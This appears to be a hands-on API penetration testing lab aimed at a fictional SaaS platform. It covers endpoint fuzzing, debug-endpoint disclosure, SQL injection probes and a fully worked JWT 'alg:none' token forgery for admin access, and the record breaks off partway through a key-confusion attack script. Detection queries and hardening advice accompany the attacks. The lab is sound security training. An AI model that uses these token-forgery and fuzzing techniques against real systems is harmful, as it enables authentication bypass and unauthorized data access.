Skip to content

Lab 25: API Security Testing

Chapter: 30 — Application Security | 44 — Web App Pentesting Difficulty: ⭐⭐⭐⭐ Advanced Estimated Time: 5–7 hours Prerequisites: Chapter 16, Chapter 30, Chapter 44, HTTP fundamentals, JSON/REST basics


Overview

In this lab you will:

  1. Perform API reconnaissance and documentation analysis — discovering endpoints, analyzing OpenAPI/Swagger specifications, and mapping the full API attack surface
  2. Execute authentication and authorization attacks — JWT token manipulation, OAuth2 flow abuse, and broken object-level authorization (BOLA) exploitation
  3. Test for injection and data exposure vulnerabilities — SQL injection via API parameters, mass assignment, excessive data exposure, and SSRF through API calls
  4. Bypass rate limiting and exploit business logic flaws — rate limit evasion, race conditions, and workflow manipulation in API-driven processes
  5. Assess GraphQL security — introspection attacks, query depth and complexity abuse, batching attacks, and field suggestion exploitation
  6. Write detection rules and defensive configurations for every attack technique tested
  7. Map all findings to OWASP API Security Top 10 2023 categories and MITRE ATT&CK techniques

Synthetic Data Only

All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 5737 (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) or RFC 1918 (10.0.0.0/8, 172.16.0.0/12) reserved ranges. All domains use *.example.com. No real applications, real credentials, or real infrastructure are referenced. All credentials shown as REDACTED. This lab is for defensive education only — never use these techniques against systems you do not own or without explicit written authorization.


Scenario

Engagement Brief — NovaTech Solutions

Organization: NovaTech Solutions (fictional) Application: NovaPlatform — multi-tenant SaaS platform with REST and GraphQL APIs REST API Base: https://api.example.com/v2 (SYNTHETIC) GraphQL Endpoint: https://graphql.example.com/query (SYNTHETIC) Developer Portal: https://developer.example.com (SYNTHETIC) Server IP: 203.0.113.50 (SYNTHETIC — RFC 5737) Internal Network: 10.50.0.0/16 (SYNTHETIC) Cloud Provider: AWS (SYNTHETIC — Account ID 123456789012) Engagement Type: Gray-box API penetration test Scope: All NovaPlatform REST API v2 endpoints, GraphQL query endpoint, OAuth2 authorization server, webhook infrastructure Out of Scope: Infrastructure (OS-level), third-party payment processor, DDoS testing, production customer data Test Window: 2026-04-01 08:00 – 2026-04-03 20:00 UTC Emergency Contact: soc@novatech.example.com (SYNTHETIC)

Summary: NovaTech Solutions has engaged your API security testing team to assess the security posture of their NovaPlatform SaaS APIs before a major enterprise client onboarding. NovaPlatform is a Python/FastAPI application with a PostgreSQL database, Redis caching layer, and an Elasticsearch-backed search service. The platform provides a REST API v2 for core operations (user management, project management, file storage, billing) and a GraphQL endpoint for analytics and reporting. The application uses JWT-based authentication with OAuth2 flows for third-party integrations. You have been provided with multiple test accounts across different tenant and role levels.


OWASP API Security Top 10 2023 Reference

Throughout this lab, findings map to the following categories:

# Category Description
API1:2023 Broken Object Level Authorization Manipulating object IDs to access other users' data
API2:2023 Broken Authentication Weak authentication mechanisms or implementation flaws
API3:2023 Broken Object Property Level Authorization Excessive data exposure or mass assignment
API4:2023 Unrestricted Resource Consumption Missing or inadequate rate limiting
API5:2023 Broken Function Level Authorization Access to admin functions from regular user context
API6:2023 Unrestricted Access to Sensitive Business Flows Abuse of legitimate business workflows
API7:2023 Server Side Request Forgery Tricking server into making requests to unintended locations
API8:2023 Security Misconfiguration Missing security headers, verbose errors, default configs
API9:2023 Improper Inventory Management Undocumented or deprecated API endpoints still active
API10:2023 Unsafe Consumption of APIs Trusting data from third-party APIs without validation

Prerequisites

Test Accounts (Synthetic)

Role Username Password API Key Tenant Notes
Standard User testuser REDACTED REDACTED-API-KEY-EXAMPLE tenant-001 Regular user account
Premium User premiumuser REDACTED REDACTED-API-KEY-EXAMPLE tenant-001 Premium tier with elevated quotas
Admin User admin REDACTED REDACTED-API-KEY-EXAMPLE tenant-001 Tenant administrator
Cross-Tenant User crossuser REDACTED REDACTED-API-KEY-EXAMPLE tenant-002 User in different tenant
Service Account svc-analytics REDACTED REDACTED-API-KEY-EXAMPLE tenant-001 Machine-to-machine service

OAuth2 Test Credentials (Synthetic)

Parameter Value
Authorization Endpoint https://auth.example.com/oauth2/authorize
Token Endpoint https://auth.example.com/oauth2/token
Client ID REDACTED-CLIENT-ID
Client Secret REDACTED-CLIENT-SECRET
Redirect URI https://app.example.com/callback
Scopes read write admin billing

Required Tools

Tool Purpose Version
Burp Suite Community/Pro Proxy, scanner, repeater, intruder 2024.x+
Postman / Insomnia API testing and collection management Latest
curl HTTP request crafting 8.x+
jq JSON parsing and manipulation 1.7+
jwt_tool JWT analysis, tampering, and exploitation 2.x+
sqlmap Automated SQL injection testing 1.8+
GraphQL Voyager GraphQL schema visualization Latest
InQL Burp extension for GraphQL testing 5.x+
ffuf API endpoint fuzzing 2.1+
mitmproxy Programmable HTTP proxy for automation 10.x+
Python 3.11+ Custom exploit scripting 3.11+
httpx Fast HTTP toolkit Latest
nuclei Template-based vulnerability scanner 3.x+
Arjun HTTP parameter discovery 2.x+
kiterunner API endpoint discovery 2.x+

Target Architecture (Synthetic)

                    ┌──────────────────────────────────────┐
                    │              Internet                 │
                    └──────────────────┬───────────────────┘
                    ┌──────────────────▼───────────────────┐
                    │   AWS ALB / WAF (CloudFront)          │
                    │   203.0.113.50:443                    │
                    │   TLS 1.3 / Rate Limiting             │
                    └───────┬──────────┬───────────────────┘
                            │          │
              ┌─────────────▼──┐  ┌────▼──────────────────┐
              │  REST API       │  │  GraphQL Gateway       │
              │  FastAPI/Uvicorn│  │  Strawberry-GraphQL    │
              │  10.50.1.10:8000│  │  10.50.1.20:8080       │
              └───┬────┬───────┘  └───┬───────┬────────────┘
                  │    │              │       │
     ┌────────────▼──┐ │   ┌──────────▼──┐   │
     │  PostgreSQL    │ │   │  Elasticsearch│  │
     │  10.50.2.10    │ │   │  10.50.2.30   │  │
     │  :5432         │ │   │  :9200        │  │
     └───────────────┘ │   └──────────────┘   │
                       │                      │
              ┌────────▼──────────────────────▼──┐
              │  Redis Cache / Session Store      │
              │  10.50.2.20:6379                  │
              └──────────────────────────────────┘
              ┌────────▼──────────────────────────┐
              │  OAuth2 Authorization Server       │
              │  10.50.1.30:9000                   │
              │  auth.example.com                  │
              └───────────────────────────────────┘
              ┌────────▼──────────────────────────┐
              │  Internal Webhook Dispatcher       │
              │  10.50.3.10:8443                   │
              │  webhooks.internal.example.com     │
              └───────────────────────────────────┘

Lab Environment Setup

Setting Up Your Proxy

Configure Burp Suite as your intercepting proxy on 127.0.0.1:8080. Ensure your browser trusts the Burp CA certificate. All API requests should route through Burp for inspection, modification, and replay. For automated testing with Python scripts, configure the requests library to use the proxy:

proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}

Step 1: Obtain Authentication Tokens

# Authenticate as standard user and obtain JWT
curl -s -X POST https://api.example.com/v2/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username": "testuser", "password": "REDACTED"}' | jq .

# Expected response (SYNTHETIC)
{
  "access_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InRlc3Qta2V5LTEifQ.eyJzdWIiOiJ1c2VyLTEwMDEiLCJ0ZW5hbnQiOiJ0ZW5hbnQtMDAxIiwicm9sZSI6InVzZXIiLCJzY29wZXMiOlsicmVhZCIsIndyaXRlIl0sImlhdCI6MTcxMTkzNjAwMCwiZXhwIjoxNzExOTM5NjAwLCJpc3MiOiJhdXRoLmV4YW1wbGUuY29tIn0.SYNTHETIC_SIGNATURE_DATA",
  "refresh_token": "REDACTED-REFRESH-TOKEN",
  "token_type": "Bearer",
  "expires_in": 3600
}
# Store the token for subsequent requests
export TOKEN="eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InRlc3Qta2V5LTEifQ.eyJzdWIiOiJ1c2VyLTEwMDEiLCJ0ZW5hbnQiOiJ0ZW5hbnQtMDAxIiwicm9sZSI6InVzZXIiLCJzY29wZXMiOlsicmVhZCIsIndyaXRlIl0sImlhdCI6MTcxMTkzNjAwMCwiZXhwIjoxNzExOTM5NjAwLCJpc3MiOiJhdXRoLmV4YW1wbGUuY29tIn0.SYNTHETIC_SIGNATURE_DATA"

# Authenticate as admin
curl -s -X POST https://api.example.com/v2/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": "REDACTED"}' | jq .

export ADMIN_TOKEN="eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InRlc3Qta2V5LTEifQ.eyJzdWIiOiJ1c2VyLTkwMDEiLCJ0ZW5hbnQiOiJ0ZW5hbnQtMDAxIiwicm9sZSI6ImFkbWluIiwic2NvcGVzIjpbInJlYWQiLCJ3cml0ZSIsImFkbWluIiwiYmlsbGluZyJdLCJpYXQiOjE3MTE5MzYwMDAsImV4cCI6MTcxMTkzOTYwMCwiaXNzIjoiYXV0aC5leGFtcGxlLmNvbSJ9.SYNTHETIC_ADMIN_SIGNATURE"

# Authenticate as cross-tenant user
curl -s -X POST https://api.example.com/v2/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username": "crossuser", "password": "REDACTED"}' | jq .

export CROSS_TOKEN="eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InRlc3Qta2V5LTEifQ.eyJzdWIiOiJ1c2VyLTIwMDEiLCJ0ZW5hbnQiOiJ0ZW5hbnQtMDAyIiwicm9sZSI6InVzZXIiLCJzY29wZXMiOlsicmVhZCIsIndyaXRlIl0sImlhdCI6MTcxMTkzNjAwMCwiZXhwIjoxNzExOTM5NjAwLCJpc3MiOiJhdXRoLmV4YW1wbGUuY29tIn0.SYNTHETIC_CROSS_SIGNATURE"

Step 2: Verify Connectivity

# Test REST API health endpoint
curl -s https://api.example.com/v2/health | jq .
# Expected: {"status": "healthy", "version": "2.4.1", "timestamp": "2026-04-01T08:00:00Z"}

# Test GraphQL endpoint
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"query": "{ __typename }"}' | jq .
# Expected: {"data": {"__typename": "Query"}}

# Verify API key authentication
curl -s https://api.example.com/v2/me \
  -H "X-API-Key: REDACTED-API-KEY-EXAMPLE" | jq .

Step 3: Configure Postman Environment

{
  "name": "NovaPlatform API Testing",
  "values": [
    {"key": "base_url", "value": "https://api.example.com/v2", "type": "default"},
    {"key": "graphql_url", "value": "https://graphql.example.com/query", "type": "default"},
    {"key": "auth_url", "value": "https://auth.example.com/oauth2", "type": "default"},
    {"key": "user_token", "value": "{{TOKEN}}", "type": "secret"},
    {"key": "admin_token", "value": "{{ADMIN_TOKEN}}", "type": "secret"},
    {"key": "cross_token", "value": "{{CROSS_TOKEN}}", "type": "secret"},
    {"key": "api_key", "value": "REDACTED-API-KEY-EXAMPLE", "type": "secret"}
  ]
}

Exercise 1: API Reconnaissance & Documentation Analysis

Objectives

  • Discover and enumerate all API endpoints through multiple reconnaissance techniques
  • Analyze OpenAPI/Swagger specifications for hidden or undocumented functionality
  • Map the complete API attack surface including deprecated and shadow endpoints
  • Identify information disclosure through API metadata, headers, and error messages
  • Understand authentication mechanisms and data flow patterns

OWASP API Mapping

Finding Category OWASP API 2023
Undocumented endpoints API9:2023 — Improper Inventory Management
Verbose error messages API8:2023 — Security Misconfiguration
Exposed debug endpoints API8:2023 — Security Misconfiguration
Shadow API versions API9:2023 — Improper Inventory Management

Step 1.1: Passive Reconnaissance

Passive First

Always begin with passive reconnaissance to minimize noise. Gather as much intelligence as possible before sending active requests to the target API.

Discover API Documentation Endpoints

# Check common documentation paths
for path in /docs /redoc /swagger /swagger-ui /swagger.json /openapi.json \
            /api-docs /api/docs /api/swagger /api/v2/docs /api/v2/openapi.json \
            /graphql /graphiql /playground /altair /voyager \
            /.well-known/openapi.json /v1/docs /v2/docs /v3/docs; do
    STATUS=$(curl -s -o /dev/null -w "%{http_code}" "https://api.example.com${path}")
    echo "[${STATUS}] https://api.example.com${path}"
done

Expected Output (Synthetic):

[200] https://api.example.com/docs
[200] https://api.example.com/redoc
[200] https://api.example.com/openapi.json
[301] https://api.example.com/swagger
[404] https://api.example.com/swagger-ui
[200] https://api.example.com/api/v2/docs
[200] https://api.example.com/api/v2/openapi.json
[403] https://api.example.com/graphql
[200] https://api.example.com/graphiql
[404] https://api.example.com/playground
[404] https://api.example.com/altair
[404] https://api.example.com/voyager
[404] https://api.example.com/.well-known/openapi.json
[200] https://api.example.com/v1/docs
[200] https://api.example.com/v2/docs
[404] https://api.example.com/v3/docs

Finding: Legacy API Version Exposed

The v1 API documentation is still accessible at /v1/docs. Legacy API versions frequently lack security patches applied to newer versions. This is API9:2023 — Improper Inventory Management.

Retrieve and Analyze OpenAPI Specification

# Download the OpenAPI spec
curl -s https://api.example.com/openapi.json | jq . > novaplatform-openapi.json

# Count total endpoints
cat novaplatform-openapi.json | jq '.paths | keys | length'
# Expected: 47

# List all endpoints with HTTP methods
cat novaplatform-openapi.json | jq -r '.paths | to_entries[] | .key as $path | .value | to_entries[] | "\(.key | ascii_upcase) \($path)"' | sort

Expected Output (Synthetic):

DELETE /v2/projects/{project_id}
DELETE /v2/projects/{project_id}/files/{file_id}
DELETE /v2/users/{user_id}
GET    /v2/admin/audit-log
GET    /v2/admin/config
GET    /v2/admin/tenants
GET    /v2/admin/users
GET    /v2/billing/invoices
GET    /v2/billing/subscription
GET    /v2/health
GET    /v2/me
GET    /v2/projects
GET    /v2/projects/{project_id}
GET    /v2/projects/{project_id}/analytics
GET    /v2/projects/{project_id}/collaborators
GET    /v2/projects/{project_id}/files
GET    /v2/projects/{project_id}/files/{file_id}
GET    /v2/projects/{project_id}/files/{file_id}/download
GET    /v2/search
GET    /v2/users/{user_id}
GET    /v2/users/{user_id}/profile
GET    /v2/webhooks
GET    /v2/webhooks/{webhook_id}
PATCH  /v2/me
PATCH  /v2/projects/{project_id}
PATCH  /v2/users/{user_id}
POST   /v2/admin/impersonate
POST   /v2/auth/login
POST   /v2/auth/logout
POST   /v2/auth/refresh
POST   /v2/auth/register
POST   /v2/auth/reset-password
POST   /v2/billing/upgrade
POST   /v2/integrations/webhook-test
POST   /v2/projects
POST   /v2/projects/{project_id}/collaborators
POST   /v2/projects/{project_id}/export
POST   /v2/projects/{project_id}/files
POST   /v2/projects/{project_id}/import
POST   /v2/search
POST   /v2/users/{user_id}/api-keys
POST   /v2/webhooks
PUT    /v2/admin/config
PUT    /v2/billing/payment-method
PUT    /v2/projects/{project_id}/files/{file_id}
PUT    /v2/webhooks/{webhook_id}

Analyze Authentication Schemes

# Extract security schemes from OpenAPI spec
cat novaplatform-openapi.json | jq '.components.securitySchemes'

Expected Output (Synthetic):

{
  "BearerAuth": {
    "type": "http",
    "scheme": "bearer",
    "bearerFormat": "JWT",
    "description": "JWT access token from /auth/login"
  },
  "ApiKeyAuth": {
    "type": "apiKey",
    "in": "header",
    "name": "X-API-Key",
    "description": "API key for service-to-service communication"
  },
  "OAuth2": {
    "type": "oauth2",
    "flows": {
      "authorizationCode": {
        "authorizationUrl": "https://auth.example.com/oauth2/authorize",
        "tokenUrl": "https://auth.example.com/oauth2/token",
        "scopes": {
          "read": "Read access to resources",
          "write": "Write access to resources",
          "admin": "Administrative access",
          "billing": "Billing management access"
        }
      }
    }
  }
}

Identify Endpoints Lacking Authentication

# Find endpoints with no security requirements
cat novaplatform-openapi.json | jq -r '
  .paths | to_entries[] |
  .key as $path |
  .value | to_entries[] |
  select(.value.security == [] or .value.security == null) |
  "\(.key | ascii_upcase) \($path)"
'

Expected Output (Synthetic):

GET    /v2/health
POST   /v2/auth/login
POST   /v2/auth/register
POST   /v2/auth/reset-password
GET    /v2/docs

Step 1.2: Active Endpoint Discovery

Fuzz for Undocumented Endpoints

# Use ffuf to discover undocumented API endpoints
ffuf -u "https://api.example.com/v2/FUZZ" \
  -w /usr/share/wordlists/api-endpoints.txt \
  -H "Authorization: Bearer $TOKEN" \
  -mc 200,201,301,302,403,405 \
  -fc 404 \
  -t 10 \
  -rate 50 \
  -o ffuf-results.json \
  -of json
# Use kiterunner for API-specific endpoint discovery
kr scan https://api.example.com/v2 \
  -w /usr/share/wordlists/kiterunner/routes-large.kite \
  -H "Authorization: Bearer $TOKEN" \
  --fail-status-codes 404 \
  --max-redirects 0

Expected Discoveries (Synthetic):

[200] GET    /v2/debug/config          — Undocumented debug configuration
[200] GET    /v2/debug/routes          — Internal route listing
[200] GET    /v2/internal/metrics      — Prometheus metrics endpoint
[403] GET    /v2/admin/backup          — Database backup endpoint
[405] DELETE /v2/admin/tenants/{id}    — Tenant deletion (method not allowed but exists)
[200] GET    /v2/swagger.yaml          — YAML version of API spec
[301] GET    /v1/users                 — Legacy v1 API still responding
[200] POST   /v2/debug/query           — Direct database query endpoint

Critical Finding: Debug Endpoints Exposed

The /v2/debug/config, /v2/debug/routes, and /v2/debug/query endpoints are accessible and not documented in the OpenAPI specification. These represent severe security misconfigurations (API8:2023) and inventory management failures (API9:2023). The debug query endpoint could allow direct database manipulation.

Examine Debug Endpoint Disclosure

# Retrieve debug configuration (SYNTHETIC DATA)
curl -s https://api.example.com/v2/debug/config \
  -H "Authorization: Bearer $TOKEN" | jq .

Expected Output (Synthetic):

{
  "app_name": "NovaPlatform",
  "version": "2.4.1",
  "environment": "staging",
  "debug_mode": true,
  "database": {
    "host": "10.50.2.10",
    "port": 5432,
    "name": "novaplatform_db",
    "user": "app_user",
    "password": "REDACTED"
  },
  "redis": {
    "host": "10.50.2.20",
    "port": 6379,
    "db": 0
  },
  "jwt_secret": "REDACTED",
  "jwt_algorithm": "RS256",
  "jwt_public_key_url": "https://auth.example.com/.well-known/jwks.json",
  "elasticsearch": {
    "host": "10.50.2.30",
    "port": 9200
  },
  "webhook_signing_secret": "REDACTED",
  "aws_region": "us-east-1",
  "s3_bucket": "novaplatform-files-staging"
}

Critical Finding: Database Credentials Exposed

The debug configuration endpoint exposes internal infrastructure details including database credentials, JWT configuration, and AWS resource identifiers. This is a critical API8:2023 — Security Misconfiguration finding.

Enumerate Internal Routes

# Retrieve internal route listing
curl -s https://api.example.com/v2/debug/routes \
  -H "Authorization: Bearer $TOKEN" | jq '.routes[] | "\(.method) \(.path) [\(.auth_required)]"' -r | sort

Expected Output (Synthetic — highlights undocumented routes):

DELETE /v2/admin/cache                [admin]
DELETE /v2/admin/sessions/{id}        [admin]
GET    /v2/admin/audit-log            [admin]
GET    /v2/admin/backup               [admin]
GET    /v2/admin/config               [admin]
GET    /v2/debug/config               [none]        ← No auth required!
GET    /v2/debug/routes               [none]        ← No auth required!
GET    /v2/debug/sql-stats            [none]        ← No auth required!
GET    /v2/health                     [none]
GET    /v2/internal/metrics           [api_key]
POST   /v2/admin/impersonate          [admin]
POST   /v2/debug/query                [none]        ← No auth required!
POST   /v2/internal/cache-invalidate  [api_key]
POST   /v2/internal/reindex           [api_key]

Step 1.3: Header and Response Analysis

Fingerprint Technology Stack

# Capture and analyze response headers
curl -s -I https://api.example.com/v2/health

Expected Output (Synthetic):

HTTP/2 200
content-type: application/json
server: uvicorn
x-powered-by: FastAPI
x-request-id: req-a1b2c3d4-e5f6-7890-abcd-ef1234567890
x-ratelimit-limit: 1000
x-ratelimit-remaining: 999
x-ratelimit-reset: 1711939600
x-content-type-options: nosniff
x-frame-options: DENY
strict-transport-security: max-age=31536000; includeSubDomains
access-control-allow-origin: *
access-control-allow-methods: GET, POST, PUT, PATCH, DELETE, OPTIONS
access-control-allow-headers: Content-Type, Authorization, X-API-Key, X-Request-ID

Finding: Information Disclosure via Headers

  • server: uvicorn and x-powered-by: FastAPI reveal the exact technology stack
  • access-control-allow-origin: * — wildcard CORS is overly permissive
  • Rate limit headers expose the exact rate limiting configuration These are API8:2023 — Security Misconfiguration issues.

Analyze Error Response Verbosity

# Trigger various error conditions to analyze response detail

# 1. Invalid JSON
curl -s -X POST https://api.example.com/v2/auth/login \
  -H "Content-Type: application/json" \
  -d 'invalid-json' | jq .

# Expected (SYNTHETIC):
# {
#   "detail": "JSON decode error at line 1 column 1: Expecting value",
#   "type": "json_invalid",
#   "trace_id": "trace-abc123",
#   "stack_trace": "File \"/app/main.py\", line 42, in parse_body..."
# }

# 2. Invalid field type
curl -s -X POST https://api.example.com/v2/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username": 12345, "password": true}' | jq .

# Expected (SYNTHETIC):
# {
#   "detail": [
#     {
#       "loc": ["body", "username"],
#       "msg": "str type expected",
#       "type": "type_error.str",
#       "ctx": {"model": "LoginRequest", "field": "username"}
#     }
#   ]
# }

# 3. Non-existent endpoint with SQL-like parameter
curl -s "https://api.example.com/v2/users/1%20OR%201=1" \
  -H "Authorization: Bearer $TOKEN" | jq .

# Expected (SYNTHETIC):
# {
#   "detail": "User not found",
#   "query_attempted": "SELECT * FROM users WHERE id = '1 OR 1=1'",
#   "error_code": "USER_NOT_FOUND"
# }

Finding: Stack Trace and SQL Query Leakage

Error responses include stack traces and raw SQL queries, revealing internal application structure and database query patterns. This is a severe API8:2023 — Security Misconfiguration that directly enables SQL injection attacks.

Step 1.4: API Version Comparison

# Compare v1 and v2 endpoints to find deprecated but accessible functionality
curl -s https://api.example.com/v1/docs 2>/dev/null | python3 -c "
import sys, json
spec = json.load(sys.stdin)
v1_paths = set(spec.get('paths', {}).keys())
print(f'V1 endpoints: {len(v1_paths)}')
for p in sorted(v1_paths):
    print(f'  {p}')
"

Expected Output (Synthetic):

V1 endpoints: 23
  /v1/admin/users
  /v1/auth/login
  /v1/auth/register
  /v1/files/upload
  /v1/files/{file_id}
  /v1/health
  /v1/projects
  /v1/projects/{project_id}
  /v1/reports/generate
  /v1/search
  /v1/users
  /v1/users/{user_id}
  /v1/users/{user_id}/password
  ...
# Test v1 authentication — may use weaker mechanism
curl -s -X POST https://api.example.com/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username": "testuser", "password": "REDACTED"}' | jq .

Expected Output (Synthetic):

{
  "token": "dGVzdHVzZXI6MTcxMTkzNjAwMDp1c2VyOnRlbmFudC0wMDE=",
  "type": "Basic",
  "note": "V1 API uses base64-encoded tokens (deprecated)"
}

Finding: Legacy API Uses Weak Authentication

The v1 API uses base64-encoded tokens instead of signed JWTs, meaning tokens can be trivially forged. The decoded value testuser:1711936000:user:tenant-001 contains the username, timestamp, role, and tenant — all modifiable without cryptographic verification. This is both API2:2023 — Broken Authentication and API9:2023 — Improper Inventory Management.

Step 1.5: Attack Surface Map

Based on reconnaissance, compile the attack surface map:

┌─────────────────────────────────────────────────────────────┐
│                 NovaPlatform Attack Surface                  │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  AUTHENTICATION SURFACE                                     │
│  ├── JWT (RS256) via /v2/auth/login                        │
│  ├── API Key via X-API-Key header                          │
│  ├── OAuth2 Authorization Code flow                        │
│  ├── Legacy base64 tokens via /v1/auth/login     [VULN]    │
│  └── Refresh token rotation via /v2/auth/refresh           │
│                                                             │
│  DOCUMENTED ENDPOINTS (47)                                  │
│  ├── User management (CRUD + profile)                      │
│  ├── Project management (CRUD + collaborators)             │
│  ├── File storage (upload, download, delete)               │
│  ├── Search (GET + POST)                                   │
│  ├── Billing (subscription, invoices, upgrade)             │
│  ├── Admin (audit log, config, users, impersonate)         │
│  └── Webhooks (CRUD + test)                                │
│                                                             │
│  UNDOCUMENTED ENDPOINTS                          [VULN]     │
│  ├── /v2/debug/config        (no auth!)                    │
│  ├── /v2/debug/routes        (no auth!)                    │
│  ├── /v2/debug/query         (no auth!)                    │
│  ├── /v2/debug/sql-stats     (no auth!)                    │
│  ├── /v2/internal/metrics    (api_key)                     │
│  ├── /v2/internal/cache-invalidate (api_key)               │
│  └── /v2/internal/reindex    (api_key)                     │
│                                                             │
│  GRAPHQL SURFACE                                            │
│  ├── /query endpoint                                       │
│  ├── GraphiQL IDE accessible                     [VULN]    │
│  └── Introspection status: TBD                             │
│                                                             │
│  INFORMATION DISCLOSURE                          [VULN]     │
│  ├── Server/framework headers                              │
│  ├── Stack traces in errors                                │
│  ├── SQL queries in error responses                        │
│  ├── Database credentials in debug config                  │
│  └── Internal IP addresses exposed                         │
│                                                             │
│  CORS CONFIGURATION                              [VULN]     │
│  └── Wildcard origin (*) with credential headers           │
│                                                             │
└─────────────────────────────────────────────────────────────┘

Detection & Defense — Exercise 1

KQL Detection: API Reconnaissance Activity

// Detect rapid sequential requests to documentation/debug endpoints
let recon_paths = dynamic(["/docs", "/redoc", "/swagger", "/openapi.json",
    "/debug/", "/internal/", "/graphiql", "/v1/"]);
ApiAccessLog
| where TimeGenerated > ago(15m)
| where URL has_any (recon_paths)
| summarize
    EndpointsHit = dcount(URL),
    RequestCount = count(),
    Paths = make_set(URL, 50)
    by ClientIP, bin(TimeGenerated, 5m)
| where EndpointsHit > 5
| project TimeGenerated, ClientIP, EndpointsHit, RequestCount, Paths
| order by EndpointsHit desc

SPL Detection: API Reconnaissance Activity

index=api_logs sourcetype=api_access
| eval is_recon=if(match(uri_path, "(docs|redoc|swagger|openapi|debug|internal|graphiql|/v1/)"), 1, 0)
| search is_recon=1
| stats dc(uri_path) as unique_paths, count as total_requests,
        values(uri_path) as paths by src_ip, span=5m _time
| where unique_paths > 5
| sort -unique_paths

Defensive Recommendations

Hardening API Documentation and Debug Endpoints

  1. Disable debug endpoints in production — use environment-based configuration to ensure /debug/* routes are never registered in production builds
  2. Restrict documentation access — require authentication for /docs, /redoc, and /openapi.json in production; consider IP-allowlisting
  3. Remove server identification headers — strip server, x-powered-by, and framework-specific headers
  4. Deprecate and decommission v1 API — if v1 must remain for backward compatibility, enforce the same authentication standards as v2
  5. Implement API inventory management — maintain a living catalog of all API endpoints with their security posture; use automated scanning to detect drift
  6. Sanitize error responses — never expose stack traces, SQL queries, or internal paths in API responses; use generic error codes with correlation IDs for debugging

Cross-Reference

For more on API inventory and application security fundamentals, see Chapter 30: Application Security and Chapter 29: Vulnerability Management.


Exercise 2: Authentication & Authorization Attacks

Objectives

  • Analyze and manipulate JWT tokens to escalate privileges
  • Exploit broken object-level authorization (BOLA) to access other users' resources
  • Abuse OAuth2 authorization code flow weaknesses
  • Test broken function-level authorization to access admin endpoints
  • Forge legacy API tokens to bypass authentication entirely

OWASP API Mapping

Finding Category OWASP API 2023
JWT manipulation API2:2023 — Broken Authentication
BOLA exploitation API1:2023 — Broken Object Level Authorization
OAuth2 flow abuse API2:2023 — Broken Authentication
Admin endpoint access API5:2023 — Broken Function Level Authorization

Step 2.1: JWT Token Analysis

Decode and Inspect JWT Structure

# Decode the JWT header
echo "$TOKEN" | cut -d'.' -f1 | base64 -d 2>/dev/null | jq .

Expected Output (Synthetic):

{
  "alg": "RS256",
  "typ": "JWT",
  "kid": "test-key-1"
}
# Decode the JWT payload
echo "$TOKEN" | cut -d'.' -f2 | base64 -d 2>/dev/null | jq .

Expected Output (Synthetic):

{
  "sub": "user-1001",
  "tenant": "tenant-001",
  "role": "user",
  "scopes": ["read", "write"],
  "iat": 1711936000,
  "exp": 1711939600,
  "iss": "auth.example.com"
}

Test JWT Algorithm Confusion (None Algorithm)

# Use jwt_tool to test algorithm confusion attacks
python3 jwt_tool.py "$TOKEN" -X a

# Manual none algorithm attack
# Create header with alg: none
echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=' | tr '/+' '_-'
# eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0

# Create payload with admin role
echo -n '{"sub":"user-1001","tenant":"tenant-001","role":"admin","scopes":["read","write","admin","billing"],"iat":1711936000,"exp":1999999999,"iss":"auth.example.com"}' | base64 | tr -d '=' | tr '/+' '_-'

# Construct the forged token (header.payload. with empty signature)
FORGED_NONE="eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJ1c2VyLTEwMDEiLCJ0ZW5hbnQiOiJ0ZW5hbnQtMDAxIiwicm9sZSI6ImFkbWluIiwic2NvcGVzIjpbInJlYWQiLCJ3cml0ZSIsImFkbWluIiwiYmlsbGluZyJdLCJpYXQiOjE3MTE5MzYwMDAsImV4cCI6MTk5OTk5OTk5OSwiaXNzIjoiYXV0aC5leGFtcGxlLmNvbSJ9."

# Test the forged token
curl -s https://api.example.com/v2/admin/users \
  -H "Authorization: Bearer $FORGED_NONE" | jq .

Expected Output (Synthetic):

{
  "users": [
    {"id": "user-1001", "username": "testuser", "role": "user", "tenant": "tenant-001"},
    {"id": "user-1002", "username": "jane.smith", "role": "user", "tenant": "tenant-001"},
    {"id": "user-9001", "username": "admin", "role": "admin", "tenant": "tenant-001"}
  ],
  "total": 3,
  "page": 1,
  "per_page": 20
}

Critical Finding: Algorithm None Attack Successful

The API accepts JWT tokens with "alg": "none", allowing complete authentication bypass. An attacker can forge tokens with arbitrary claims (including admin role) without knowing the signing key. This is a critical API2:2023 — Broken Authentication vulnerability.

Test JWT Key Confusion (RS256 to HS256)

# Fetch the public key
curl -s https://auth.example.com/.well-known/jwks.json | jq .

Expected Output (Synthetic):

{
  "keys": [
    {
      "kty": "RSA",
      "kid": "test-key-1",
      "use": "sig",
      "alg": "RS256",
      "n": "SYNTHETIC_RSA_MODULUS_DATA",
      "e": "AQAB"
    }
  ]
}
# Convert JWKS to PEM format
python3 -c "
from jwcrypto import jwk
import json

# Synthetic JWKS data
jwks_data = '{\"keys\":[{\"kty\":\"RSA\",\"kid\":\"test-key-1\",\"use\":\"sig\",\"alg\":\"RS256\",\"n\":\"SYNTHETIC_RSA_MODULUS_DATA\",\"e\":\"AQAB\"}]}'
jwks = json.loads(jwks_data)
key = jwk.JWK(**jwks['keys'][0])
print(key.export_to_pem())
" > public_key.pem

# Use jwt_tool for key confusion attack (RS256 → HS256)
python3 jwt_tool.py "$TOKEN" -X k -pk public_key.pem
# Key confusion attack script (SYNTHETIC - educational only)
import jwt
import json
import base64

# Read the public key
with open('public_key.pem', 'r') as f:
    public_key = f.read()

# Create admin payload
payload = {
